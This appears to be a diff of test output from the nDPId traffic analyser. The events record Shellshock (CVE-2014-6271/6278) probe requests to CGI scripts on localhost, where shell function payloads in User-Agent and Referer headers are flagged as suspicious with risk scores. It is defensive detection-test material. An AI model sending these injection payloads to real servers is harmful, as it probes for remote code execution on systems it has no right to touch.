{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-hist.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1576420277389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"ts_msec":1576420277389,"pkt":"AAAAAAAAAAAAAAAACABFAAELgRJAAEAGuth\/AAABfwAAAcUSH5B08bnUX64J5YAYAED+\/wAAAQEICp1m\/bWdZv21R0VUIC9iYW5uZXIuY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/banner.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/banner.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1576420277391,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"ts_msec":1576420277391,"pkt":"AAAAAAAAAAAAAAAACABFAAEJF\/tAAEAGI\/J\/AAABfwAAAcUUH5B+1S87jYTLUoAYAED+\/QAAAQEICp1m\/bedZv23R0VUIC9ib29rLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/book.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/book.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1576420277392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"ts_msec":1576420277392,"pkt":"AAAAAAAAAAAAAAAACABFAAEM+RhAAEAGQtF\/AAABfwAAAcUWH5DPIMHTViTvW4AYAED\/AAAAAQEICp1m\/bidZv24R0VUIC9jZ2lpbmZvLmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgiinfo.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgiinfo.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1576420277394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"ts_msec":1576420277394,"pkt":"AAAAAAAAAAAAAAAACABFAAELY9VAAEAG2BV\/AAABfwAAAcUYH5AazFsY4\/xNyIAYAED+\/wAAAQEICp1m\/bqdZv26R0VUIC9jZ2l0ZXN0LnB5IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgitest.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgitest.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1576420277395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"ts_msec":1576420277395,"pkt":"AAAAAAAAAAAAAAAACABFAAEMSAFAAEAG8+h\/AAABfwAAAcUaH5B7UH87Bk0XQYAYAED\/AAAAAQEICp1m\/budZv27R0VUIC9jZ2lfd3JhcHBlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi_wrapper","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi_wrapper","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1576420277398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"ts_msec":1576420277398,"pkt":"AAAAAAAAAAAAAAAACABFAAEMKndAAEAGEXN\/AAABfwAAAcUcH5BMbxKxdmdFb4AYAED\/AAAAAQEICp1m\/b6dZv2+R0VUIC9jb250YWN0LmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/contact.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/contact.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1576420277399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"ts_msec":1576420277399,"pkt":"AAAAAAAAAAAAAAAACABFAAEK9YVAAEAGRmZ\/AAABfwAAAcUeH5Br181GQEYmBIAYAED+\/gAAAQEICp1m\/b+dZv2\/R0VUIC9jb3VudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/count.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/count.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1576420277401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"ts_msec":1576420277401,"pkt":"AAAAAAAAAAAAAAAACABFAAETxAhAAEAGd9p\/AAABfwAAAcUgH5CMzvzBXE4TboAYAED\/BwAAAQEICp1m\/cGdZv3BR0VUIC9kZWZhdWx0d2VicGFnZS5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
